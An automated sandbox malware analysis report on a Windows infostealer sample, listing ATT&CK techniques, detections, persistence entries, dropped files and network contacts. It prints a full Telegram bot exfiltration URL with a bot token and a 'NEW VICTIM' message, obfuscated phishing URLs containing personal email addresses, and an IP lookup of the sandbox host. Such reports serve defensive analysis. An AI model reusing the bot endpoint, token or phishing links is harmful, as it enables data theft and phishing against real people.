Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 1 File Deletion | NTDS | 22 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 113 Masquerading | LSA Secrets | 1 Network Share Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Process Injection | DCSync | 31 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 2 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

Source | Detection | Scanner | Label | Link
file.exe | 63% | ReversingLabs | Win32.Ransomware.Generic |
file.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Program Files\Windows Media Player\graph\graph.exe | 0% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://drive-preprod.corp.g | 0% | Avira URL Cloud | safe |
https://drive-daily-1.corp.google.com | 0% | Avira URL Cloud | safe |
https://chrome.goo | 0% | Avira URL Cloud | safe |
https://chrome.g | 0% | Avira URL Cloud | safe |
http://microsoft.co | 0% | Avira URL Cloud | safe |
https://drive-preprod.corp.gH | 0% | Avira URL Cloud | safe |
https://drive-daily-2.corp.google.co | 0% | Avira URL Cloud | safe |
https://drive.google.co | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipinfo.io | 34.117.59.81 | true | false | | high
drive.google.com | 216.58.208.238 | true | false | | high
drive.usercontent.google.com | 172.217.17.65 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://ipinfo.io/json | false | | high
https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20648351%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
34.117.59.81 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
172.217.17.65 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
216.58.208.238 | drive.google.com | United States | 15169 | GOOGLEUS | false

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1573853
Start date and time:2024-12-12 17:00:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 7m 27s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Run with higher sleep bypass
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:file.exe
Detection:MAL
Classification:mal80.troj.spyw.winEXE@8/9@4/4
                                                                                                                                            EGA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            • Number of executed functions: 72
                                                                                                                                            • Number of non-executed functions: 133
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                            • VT rate limit hit for: file.exe
Time | Type | Description
17:01:08 | Task Scheduler | Run new task: MyBootTask path: C:\Users\user\Desktop\file.exe
17:01:20 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
17:01:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            149.154.167.220file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                fWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
                                                                                                                                                  Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        Message_2712729.emlGet hashmaliciousunknownBrowse
                                                                                                                                                          https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              34.117.59.81file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                                                                              • ipinfo.io/ip
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              ipinfo.iofile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              http://enteolcl.top/Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              Product Blueprint..htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              dYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              api.telegram.orgfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Message_2712729.emlGet hashmaliciousunknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              TELEGRAMRUfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • 149.154.167.99
                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • 149.154.167.99
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              fWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                              • 149.154.167.99
                                                                                                                                                              Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              Josho.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.119.80.120
                                                                                                                                                              http://enteolcl.top/Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              Product Blueprint..htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              k5NcGFI29j.exeGet hashmaliciousJigsawBrowse
                                                                                                                                                              • 34.117.188.166
                                                                                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                              • 34.117.188.166
                                                                                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                              • 34.117.188.166
                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                              • 34.117.188.166
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Vidar | 149.154.167.220, 172.217.17.65, 216.58.208.238, 34.117.59.81
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar | 149.154.167.220, 172.217.17.65, 216.58.208.238, 34.117.59.81
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Vidar | 149.154.167.220, 172.217.17.65, 216.58.208.238, 34.117.59.81
37f463bf4616ecd445d4a1937da06e19 | yiDQb6GkBq.exe | malicious | Amadey, LummaC Stealer, Vidar | 149.154.167.220, 172.217.17.65, 216.58.208.238, 34.117.59.81
37f463bf4616ecd445d4a1937da06e19 | jN6irWtNiG.lnk | malicious | Unknown | 149.154.167.220, 172.217.17.65, 216.58.208.238, 34.117.59.81
37f463bf4616ecd445d4a1937da06e19 | yOmgCWM83b.lnk | malicious | Unknown | 149.154.167.220, 172.217.17.65, 216.58.208.238, 34.117.59.81
37f463bf4616ecd445d4a1937da06e19 | copia111224mp.hta | malicious | Unknown | 149.154.167.220, 172.217.17.65, 216.58.208.238, 34.117.59.81
37f463bf4616ecd445d4a1937da06e19 | Agreement for Cooperation.PDF.lnk.download.lnk | malicious | RedLine | 149.154.167.220, 172.217.17.65, 216.58.208.238, 34.117.59.81
37f463bf4616ecd445d4a1937da06e19 | Agreement for YouTube cooperation.pdf.lnk.download.lnk | malicious | Unknown | 149.154.167.220, 172.217.17.65, 216.58.208.238, 34.117.59.81
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files\Windows Media Player\graph\graph.exe | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):156917
                                                                                                                                                                Entropy (8bit):7.994509354006501
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, Author: ditekSHen
                                                                                                                                                                Reputation:low
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):123394
                                                                                                                                                                Entropy (8bit):7.993523589542907
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:1536:NoxiTioXtBWFfsYExW94I9tiiGCidzWdZNF9p3Ymn9Zqmi943C42nYEmL9yqhTjV:yxFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre
                                                                                                                                                                MD5:53E54AC43786C11E0DDE9DB8F4EB27AB
                                                                                                                                                                SHA1:9C5768D5EE037E90DA77F174EF9401970060520E
                                                                                                                                                                SHA-256:2F606D24809902AF1BB9CB59C16A2C82960D95BFF923EA26F6A42076772F1DB8
                                                                                                                                                                SHA-512:CD1F6D5F4D8CD19226151B6674124AB1E10950AF5A049E8C082531867D71BFAE9D7BC65641171FD55D203E4FBA9756C80D11906D85A30B35EE4E8991ADB21950
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):251392
                                                                                                                                                                Entropy (8bit):6.173345887744036
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:TxwndeWCdXSpfDYlUgEP86yZ7JUlfQEc:Tx1dXYYlLEP8l7J8
                                                                                                                                                                MD5:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                SHA1:7BD1D979DE4A86CB0D8C2AD9E1945BD351339AD0
                                                                                                                                                                SHA-256:D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
                                                                                                                                                                SHA-512:C3164B2F09DC914066201562BE6483F61D3C368675AC5D3466C2D5B754813B8B23FD09AF86B1F15AB8CC91BE8A52B3488323E7A65198E5B104F9C635EC5ED5CC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Joe Sandbox View:
• Filename: file.exe, Detection: malicious
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):776
                                                                                                                                                                Entropy (8bit):5.108291155461825
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:YKOHmy1JVBa4YGQVPe071kWyPyoZEB6BasJENBm9c:YVHmQTBj/Q51WPtZ7ujMc
                                                                                                                                                                MD5:4CFB7E0E1DCD6F13DAD24D92EF124D76
                                                                                                                                                                SHA1:00009BCAE4BD213E72811B7E53968423596EF90D
                                                                                                                                                                SHA-256:292EB11391FD6EDFFBFF01DF1DFE62E88E4D618B6EB07D0D4A8D8BE3D185458C
                                                                                                                                                                SHA-512:8F1DB69DB67EBDCDBB2B1DC3997496F679C14D3BA7FDEFC158CB7A19665B28F509A79BA997D2982E49A759133B7BB994B863E842D385B3C89B7074EAC5AE25F4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"ok":true,"result":{"message_id":3331,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734019283,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 648351\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):321
                                                                                                                                                                Entropy (8bit):4.99323851364312
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
                                                                                                                                                                MD5:7225D8C283F7B303692A163301880199
                                                                                                                                                                SHA1:7BF7F829E108693DB3DAD66B557EAA1DBA464D94
                                                                                                                                                                SHA-256:19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
                                                                                                                                                                SHA-512:05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):156917
                                                                                                                                                                Entropy (8bit):7.994509354006501
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\output[1].png, Author: ditekSHen
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):156917
                                                                                                                                                                Entropy (8bit):7.994509354006501
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, Author: ditekSHen
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):776
                                                                                                                                                                Entropy (8bit):5.111417579302489
                                                                                                                                                                Encrypted:false
